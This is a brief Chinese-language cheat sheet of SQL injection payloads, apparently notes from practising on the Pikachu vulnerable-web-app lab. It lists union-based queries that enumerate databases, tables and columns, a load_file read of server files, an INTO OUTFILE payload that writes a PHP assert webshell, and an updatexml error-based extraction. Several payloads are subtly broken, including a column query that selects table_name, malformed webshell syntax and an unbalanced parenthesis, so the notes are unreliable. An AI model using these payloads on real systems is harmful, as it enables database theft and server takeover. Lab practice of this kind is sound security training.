记录一些在使用 pikahcu 练习时用到的命令。
# SQL 注入
- 获取数据库名
1
# union select database ()
- 获取表名
1
# union select group_concat (table_name) from information_schema.tables where table_schema=database ()
- 获取列名
1
# union select group_concat (table_name) from information_schema.columns where table_name=' 表名 '
- 读文件
1
# union select load_file ('Path') from 表名
- 写文件
1
# union select '<!php assert ($_POST [1];?)>' into outfile 'Path'
- 报错回显
1
# and updatexml (1,concat (0x7e,(select database ()),0x7e),1))